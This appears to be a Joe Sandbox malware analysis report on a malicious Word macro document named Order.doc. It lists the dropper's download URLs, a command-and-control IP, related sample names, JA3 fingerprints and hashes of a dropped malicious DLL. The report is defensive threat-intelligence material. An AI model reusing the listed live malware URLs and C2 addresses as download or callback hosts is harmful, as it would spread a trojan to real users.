http://www.%s.comPA | 0% | URL Reputation | safe
http://ocsp.entrust.net0D | 0% | URL Reputation | safe
https://shop.nowfal.dev/wp-includes/RlMObf2j0/ | 100% | Avira URL Cloud | malware

(Trailing characters such as "03", "0D" or "0" on several URLs are bytes that followed the string in memory; the URLs are reproduced as the scanner reported them.)

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
shop.nowfal.dev | 104.21.88.166 | true | true | | unknown
nightlifemumbai.club | 172.217.6.174 | true | true | | unknown

                      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://nightlifemumbai.club/x/0wBD3/ | true | 5% Virustotal; Avira URL Cloud: malware | unknown
http://190.55.186.229/efl8dd1i/ | true | Avira URL Cloud: safe | unknown

                      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.windows.com/pctv. | rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmp | false | | high
http://investor.msn.com | powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094919948.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093582036.0000000001FC0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095246701.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094919948.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093582036.0000000001FC0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095246701.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmp | false | | high
https://jflmktg.wpcomstaging.com/wp-content/AK/ | powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmp | true | 0% Virustotal; Avira URL Cloud: malware | unknown
http://crl.entrust.net/server1.crl0 | powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp | false | | high
http://ocsp.entrust.net03 | powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://shop.nowfal.dev | powershell.exe, 00000005.00000002.2095244145.0000000003AC4000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://nightlifemumbai.club | powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.diginotar.nl/cps/pkioverheid0 | powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://e-wdesign.eu/wp-content/bn1IgDejh/ | powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2095171986.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093779954.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095562122.00000000020E7000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094919948.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093582036.0000000001FC0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095246701.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmp | false | | high
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2095171986.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093779954.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095562122.00000000020E7000.00000002.00000001.sdmp | false | | high
http://traumfrauen-ukraine.de/bin/JyeS/ | powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.icra.org/vocabulary/. | powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2095171986.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093779954.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095562122.00000000020E7000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | powershell.exe, 00000005.00000002.2090481396.00000000024B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2098401477.0000000002A70000.00000002.00000001.sdmp | false | | high
https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/ | powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://investor.msn.com/ | powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094919948.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093582036.0000000001FC0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095246701.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmp | false | | high
http://www.%s.comPA | powershell.exe, 00000005.00000002.2090481396.00000000024B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2098401477.0000000002A70000.00000002.00000001.sdmp | false | URL Reputation: safe | low
http://ocsp.entrust.net0D | powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://secure.comodo.com/CPS0 | powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp | false | | high
http://crl.entrust.net/2048ca.crl0 | powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp | false | | high
https://shop.nowfal.dev/wp-includes/RlMObf2j0/ | powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown

(The six URLs flagged malicious, all found in the same powershell.exe heap region 00000005.00000002.2095129906.00000000039E2000, are the dropper's download list; the remaining entries are certificate, CRL and OCSP strings from system libraries mapped into the processes and are not indicators.)

                                          Contacted IPs


                                          Public

IP | Domain | Country | ASN | ASN Name | Malicious
104.21.88.166 | unknown | United States | 13335 | CLOUDFLARENETUS | true
172.217.6.174 | unknown | United States | 15169 | GOOGLEUS | true
190.55.186.229 | unknown | Argentina | 27747 | TelecentroSAAR | true

                                          General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 344065
Start date: 25.01.2021
Start time: 23:13:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 48s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Order.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winDOC@20/8@2/3
EGA Information: Failed
HDC Information:
• Successful, ratio: 8.4% (good quality ratio 8%)
• Quality average: 72.1%
• Quality standard deviation: 25.3%
HCA Information: Failed
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Found warning dialog
• Click Ok
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
• TCP Packets have been reduced to 100
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                                          Simulations

                                          Behavior and APIs

Time | Type | Description
23:13:36 | API Interceptor | 1x Sleep call for process: msg.exe modified
23:13:37 | API Interceptor | 48x Sleep call for process: powershell.exe modified
23:13:43 | API Interceptor | 875x Sleep call for process: rundll32.exe modified

                                          Joe Sandbox View / Context

                                          IPs

Match | Associated Sample Name / URL | Detection | Context
104.21.88.166 | N00048481397007.doc | malicious |
172.217.6.174 | N00048481397007.doc | malicious | nightlifemumbai.club/x/0wBD3/
172.217.6.174 | Scan_Image_From_QUINNEY_&_ASSOCIATES.pdf | malicious | crl.pki.goog/GTSGIAG3.crl
172.217.6.174 | d5#U309a.doc | malicious | clients1.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih%2BZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCEbXmsCz9vTc
190.55.186.229 | N00048481397007.doc | malicious | 190.55.186.229/pvaadnb3/
190.55.186.229 | Invoice 6682363.doc | malicious | 190.55.186.229/zu0s8fp/p0ci9j50w974/cj5r0kfb71n/m8g30yu0kjfggim2u/66n2ab/ipuz3m08m8x037v8/
190.55.186.229 | certificado.doc | malicious | 190.55.186.229/t3u070voc/dhvfsiwa8/4hr1scfgu20pt/iroc8/mlfa/v0pznqop/
190.55.186.229 | SecuriteInfo.com.Mal.DocDl-K.24054.doc | malicious | 190.55.186.229/i9lbsrtqcu0eub47zf/
190.55.186.229 | SecuriteInfo.com.Mal.DocDl-K.32352.doc | malicious | 190.55.186.229/jgeu/
190.55.186.229 | SecuriteInfo.com.Mal.DocDl-K.460.doc | malicious | 190.55.186.229/mlqum5rvy23mclyw98/bxc1sxq6pyd4l/glso7yy9y6j/63ww5/j94pvx/
190.55.186.229 | PQWX99943.doc | malicious | 190.55.186.229/b0sm4wo0eycy/enwxs3/ch9vx64v/

(172.217.6.174 is a Google front-end address shared with CRL and OCSP traffic from unrelated samples, so the IP alone is a weak indicator; the nightlifemumbai.club path is the usable one. 190.55.186.229, by contrast, recurs as a C2 across a string of maldoc samples with randomised URI paths and is a strong indicator.)

Domains

Match | Associated Sample Name / URL | Detection | Context
shop.nowfal.dev | N00048481397007.doc | malicious | 104.21.88.166
nightlifemumbai.club | N00048481397007.doc | malicious | 172.217.6.174

ASN

Match | Associated Sample Name / URL | Detection | Context
TelecentroSAAR | N00048481397007.doc | malicious | 190.55.186.229
TelecentroSAAR | Invoice 6682363.doc | malicious | 190.55.186.229
TelecentroSAAR | certificado.doc | malicious | 190.55.186.229
TelecentroSAAR | SecuriteInfo.com.Mal.DocDl-K.24054.doc | malicious | 190.55.186.229
TelecentroSAAR | SecuriteInfo.com.Mal.DocDl-K.32352.doc | malicious | 190.55.186.229
TelecentroSAAR | SecuriteInfo.com.Mal.DocDl-K.460.doc | malicious | 190.55.186.229
TelecentroSAAR | PQWX99943.doc | malicious | 190.55.186.229
TelecentroSAAR | dq1J3cjv.exe | malicious | 186.19.62.249
TelecentroSAAR | malware1.exe | malicious | 186.19.26.230
TelecentroSAAR | Astra.x86 | malicious | 181.45.174.122
TelecentroSAAR | ezkQ0RtL.exe | malicious | 186.19.62.249
TelecentroSAAR | 14240456646.exe | malicious | 186.19.62.249
TelecentroSAAR | GsQzmGULNs.exe | malicious | 186.23.189.192
TelecentroSAAR | 43mai.exe | malicious | 186.19.205.93
TelecentroSAAR | 27Label_00384463.doc.js | malicious | 181.44.194.254
TelecentroSAAR | 363evUVPRxr3.exe | malicious | 186.19.196.93
TelecentroSAAR | 4Cc4YU01dF.sct | malicious | 186.23.49.11
TelecentroSAAR | http://206.189.68.184/xybt_A1sb-SMlX/qFX/Attachments/02_19 | malicious | 190.55.118.192
TelecentroSAAR | 20tex.exe | malicious | 186.19.212.93
TelecentroSAAR | 01_2019_DTK206094-45.doc | malicious | 200.125.113.60
GOOGLEUS | FileZilla_3.52.2_win64_sponsored-setup.exe | malicious | 216.58.207.142
GOOGLEUS | N00048481397007.doc | malicious | 172.217.6.174
GOOGLEUS | DHL.6.apk | malicious | 172.217.20.238
GOOGLEUS | Tebling_Resortsac_FILE-HP38XM.htm | malicious | 172.217.22.225
GOOGLEUS | DHL.6.apk | malicious | 172.217.20.238
GOOGLEUS | k.dll | malicious | 35.247.145.179
GOOGLEUS | DHL.apk | malicious | 216.58.207.138
GOOGLEUS | 560911_P.EXE | malicious | 34.102.136.180
GOOGLEUS | RevisedPO.24488_pdf.exe | malicious | 34.102.136.180
GOOGLEUS | 67654565677.htmL | malicious | 172.217.22.225
GOOGLEUS | documents_0084568546754.exe | malicious | 34.102.136.180
GOOGLEUS | SAMSUNG C&T UPCOMING PROJECTS19-027-MP-010203.exe.exe | malicious | 34.102.136.180
GOOGLEUS | pl.cda_310.apk | malicious | 172.217.23.14
GOOGLEUS | pl.cda_310.apk | malicious | 172.217.22.238
GOOGLEUS | Acunetix Premium v13.0.201112128 Activation Tool.exe | malicious | 172.217.22.226
GOOGLEUS | F-Droid.apk | malicious | 216.239.35.0
GOOGLEUS | F-Droid.apk | malicious | 172.217.20.238
GOOGLEUS | org.thoughtcrime.securesms_77202.apk | malicious | 216.58.207.138
GOOGLEUS | org.thoughtcrime.securesms_77202.apk | malicious | 172.217.20.234
GOOGLEUS | fusion.exe | malicious | 173.194.69.108
CLOUDFLARENETUS | SecuriteInfo.com.Heur.13954.xls | malicious | 104.21.22.6
CLOUDFLARENETUS | FileZilla_3.52.2_win64_sponsored-setup.exe | malicious | 162.159.200.1
CLOUDFLARENETUS | PAYMENT INFO.xlsx | malicious | 104.16.18.94
CLOUDFLARENETUS | PAYMENT INFO.xlsx | malicious | 104.16.18.94
CLOUDFLARENETUS | qp38gXDG87.exe | malicious | 172.67.142.109
CLOUDFLARENETUS | case_3499.xls | malicious | 172.67.130.49
CLOUDFLARENETUS | case.2991.xls | malicious | 172.67.130.49
CLOUDFLARENETUS | N00048481397007.doc | malicious | 104.21.88.166
CLOUDFLARENETUS | fod1jZt8yK.exe | malicious | 104.23.98.190
CLOUDFLARENETUS | info5440.xls | malicious | 104.21.7.112
CLOUDFLARENETUS | notif-3615.xls | malicious | 104.21.84.93
CLOUDFLARENETUS | RFQ for the supply of materialsservices for P.O. No. - 4700001838.exe | malicious | 104.23.99.190
CLOUDFLARENETUS | notif6158.xls | malicious | 104.21.84.93
CLOUDFLARENETUS | file.exe | malicious | 172.67.188.154
CLOUDFLARENETUS | k.dll | malicious | 104.21.88.84
CLOUDFLARENETUS | Quotation for T10495.exe | malicious | 104.21.19.200
CLOUDFLARENETUS | FP4554867134UQ.doc | malicious | 172.67.215.216
CLOUDFLARENETUS | case (348).xls | malicious | 104.21.23.220
CLOUDFLARENETUS | case (348).xls | malicious | 172.67.213.245
CLOUDFLARENETUS | MENSAJE.doc | malicious | 172.67.156.114

JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context
05af1f5ca1b87cc9cc9b25185115607d | SecuriteInfo.com.Heur.13954.xls | malicious | 104.21.88.166
05af1f5ca1b87cc9cc9b25185115607d | case_3499.xls | malicious | 104.21.88.166
05af1f5ca1b87cc9cc9b25185115607d | case.2991.xls | malicious | 104.21.88.166
05af1f5ca1b87cc9cc9b25185115607d | N00048481397007.doc | malicious | 104.21.88.166
05af1f5ca1b87cc9cc9b25185115607d | info5440.xls | malicious | 104.21.88.166
05af1f5ca1b87cc9cc9b25185115607d | notif-3615.xls | malicious | 104.21.88.166
05af1f5ca1b87cc9cc9b25185115607d | notif6158.xls | malicious | 104.21.88.166
05af1f5ca1b87cc9cc9b25185115607d | INC_Y5KPAYAWWU7.doc | malicious | 104.21.88.166
05af1f5ca1b87cc9cc9b25185115607d | mensaje_012021_1-538086.doc | malicious | 104.21.88.166
05af1f5ca1b87cc9cc9b25185115607d | eiW9G6sAIS.xlsm | malicious | 104.21.88.166
05af1f5ca1b87cc9cc9b25185115607d | eiW9G6sAIS.xlsm | malicious | 104.21.88.166
05af1f5ca1b87cc9cc9b25185115607d | 2531 2212 2020 QG-826729.doc | malicious | 104.21.88.166
05af1f5ca1b87cc9cc9b25185115607d | USD_ Payment Schedule.xls | malicious | 104.21.88.166
05af1f5ca1b87cc9cc9b25185115607d | Arch 30 S_07215.doc | malicious | 104.21.88.166
05af1f5ca1b87cc9cc9b25185115607d | Info-237-602317.doc | malicious | 104.21.88.166
05af1f5ca1b87cc9cc9b25185115607d | Info-237-602317.doc | malicious | 104.21.88.166
05af1f5ca1b87cc9cc9b25185115607d | 8776139.docm | malicious | 104.21.88.166
05af1f5ca1b87cc9cc9b25185115607d | 8776139.docm | malicious | 104.21.88.166
05af1f5ca1b87cc9cc9b25185115607d | 2021_20_01_31624.doc | malicious | 104.21.88.166
05af1f5ca1b87cc9cc9b25185115607d | 433.doc | malicious | 104.21.88.166

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A07A78F5-D643-47FF-B622-0CF30ED55516}.tmp
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1024
                                            Entropy (8bit):0.05390218305374581
                                            Encrypted:false
                                            SSDEEP:3:ol3lYdn:4Wn
                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E3975822-A796-4096-8B6B-C6BCF64E2588}.tmp
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1536
                                            Entropy (8bit):1.3555252507007243
                                            Encrypted:false
                                            SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbs:IiiiiiiiiifdLloZQc8++lsJe1Mz5l
                                            MD5:8F83FE1F31DE39C1D9B5770AAADEBA0D
                                            SHA1:D632C1ACE854A9EFBA1697ECEDD6A0067FBC669F
                                            SHA-256:8A187529AE64BE7E8C62581F1F097ECF184DA59FD4855374C921B4900819305C
                                            SHA-512:40B6E44D05AEC530A7B05876EC8C9986CF7608633A366E53D9DC80A3F1C0343AB1FDFF3957F24A1214FC2CF925429A8E0B7BD7E1C57B46EDF441283406537136
                                            Malicious:false
                                            Reputation:low
                                            Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Order.LNK
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:11 2020, mtime=Wed Aug 26 14:08:11 2020, atime=Tue Jan 26 06:13:33 2021, length=142336, window=hide
                                            Category:dropped
                                            Size (bytes):1970
                                            Entropy (8bit):4.4965710105179895
                                            Encrypted:false
                                            SSDEEP:24:848n/XTr6N4U8yPSeqDv3qc4dM7dD248n/XTr6N4U8yPSeqDv3qc4dM7dV:844/XT+NnP6ifQh244/XT+NnP6ifQ/
                                            MD5:8836D1455A5B492BAEA935C695F6DB1E
                                            SHA1:69E780622524B28E7CBF1BE3CB9B65366D865CD2
                                            SHA-256:E620D0EBDD84A6F402D68CC06D32A32DE6F671344C930760A44C68DCE0895E39
                                            SHA-512:AFA21B3B2BAC7349F4BF237565527D01EDEBB3668E42EF01A4F12CABFC191E1DDC85F5D9F0F835AE31FCCD14AA38AD512646FB83C0BC3DEDCDA223C5D3F44341
                                            Malicious:false
                                            Reputation:low
                                            Preview: L..................F.... ...T\...{..T\...{...4.......,...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....X.2..,..:R.9 .Order.doc.@.......Q.y.Q.y*...8.....................O.r.d.e.r...d.o.c.......s...............-...8...[............?J......C:\Users\..#...................\\585948\Users.user\Desktop\Order.doc. .....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.O.r.d.e.r...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......585948..........D_....3N...W...9F.C...........[D_....3N...W...9F.C...........[....L..............
                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):53
                                            Entropy (8bit):3.9094714650359332
                                            Encrypted:false
                                            SSDEEP:3:M1sBYFFoyOFFomX1sBYFFov:MSBYjAj0BYjy
                                            MD5:DE7882B51ABEB0B80147A66F2A1CF8F5
                                            SHA1:296A148DF07BA72D9EB084647648A37312E2752A
                                            SHA-256:FD766F931C987F5357FC874686E351CFDF3FBF40322D815A20729A10B48FD32E
                                            SHA-512:88130EDB398212AB6FADDB566A3AD1F396367DE8A33D49CC3EC9DB4CC971BC24D96D83AA3316380E144A6E00DB5DB1B9FB7430F13C8368E53AD394C93D069943
                                            Malicious:false
                                            Preview: [doc]..Order.LNK=0..Order.LNK=0..[doc]..Order.LNK=0..
                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):162
                                            Entropy (8bit):2.431160061181642
                                            Encrypted:false
                                            SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                            MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                            SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                            SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                            SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                            Malicious:false
                                            Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y1B2TNFFMYFTDZJ3L541.temp
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):8016
                                            Entropy (8bit):3.591236346963085
                                            Encrypted:false
                                            SSDEEP:96:chQCsMqZqvsqvJCwoBz8hQCsMqZqvsEHyqvJCwor/z1PYyHyf8ILlUVLIu:cywoBz8yMHnor/z1+f8IsIu
                                            MD5:DBB6F2ED4406C0905F6BE3DF522FF8AB
                                            SHA1:9502BDB76928232D12FD17D00F2B22DE60A94BFD
                                            SHA-256:D449741722E4DEA768A2F8896628AC5F2136791B4F61626FAFDBDFF43D4AC37A
                                            SHA-512:DF5F33A98F488701D1F1A341B44AF5C70AECD550D67BF489D73DE7D3442FCFE83239BFD73117A2466A43E71757E75ED996389FECD5340CB36EDF1DFA82DC1A89
                                            Malicious:false
                                            Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                            C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):624128
                                            Entropy (8bit):6.9039392338972965
                                            Encrypted:false
                                            SSDEEP:12288:4YzchQVZnkmt/70MWugxPJZFpf0c1pHgbdJxUR9rNXZL4:L4KV5Hpt8bZHL4nM919
                                            MD5:46F0A7BA7416C01A1A3D349024CFEB91
                                            SHA1:B2D3446F52EDED67773DD54F6A4B720D60F9A094
                                            SHA-256:0299170ABAED37E0A89FEF77CBBD1921E7891A5BCA94A9F1B650C5370DCF3400
                                            SHA-512:C4A45F8EF20CC0A74882A661AD365E9AFAF57F9B00B8B262A84B0BABF6709B96B0D177794544E58C7603DD5E2010CA76945506688D9090FABC168B37766B80D0
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 39%
                                            Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................0...R.......>.......@....@..........................................................................p..."...............................n..................................................................................CODE.............0.................. ..`DATA.........@.......4..............@...BSS..........`.......J...................idata..."...p...$...J..............@....reloc...n.......p...n..............@..P.rsrc...............................@..P....................................@..P........................................................................................................................................................................................................................
                                            C:\Users\user\Desktop\~$Order.doc
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):162
                                            Entropy (8bit):2.431160061181642
                                            Encrypted:false
                                            SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                            MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                            SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                            SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                            SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                            Malicious:true
                                            Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

                                            Static File Info

                                            General

                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Harum consequatur suscipit voluptatem explicabo placeat laborum. Est quidem sequi enim tenetur., Author: Margarita Lara, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Jan 25 09:18:00 2021, Last Saved Time/Date: Mon Jan 25 09:18:00 2021, Number of Pages: 1, Number of Words: 5366, Number of Characters: 30587, Security: 8
                                            Entropy (8bit):6.219456379922718
                                            TrID:
                                            • Microsoft Word document (32009/1) 79.99%
                                            • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                            File name:Order.doc
                                            File size:141824
                                            MD5:1a0ae833990a558910254e9bebfaeeaf
                                            SHA1:c6f348043fb590f9638ed792a331695475b79af1
                                            SHA256:5648715fe9ed7418d2d2b101a4ae8f4bb814ac68e422f78641595b37a83eb84e
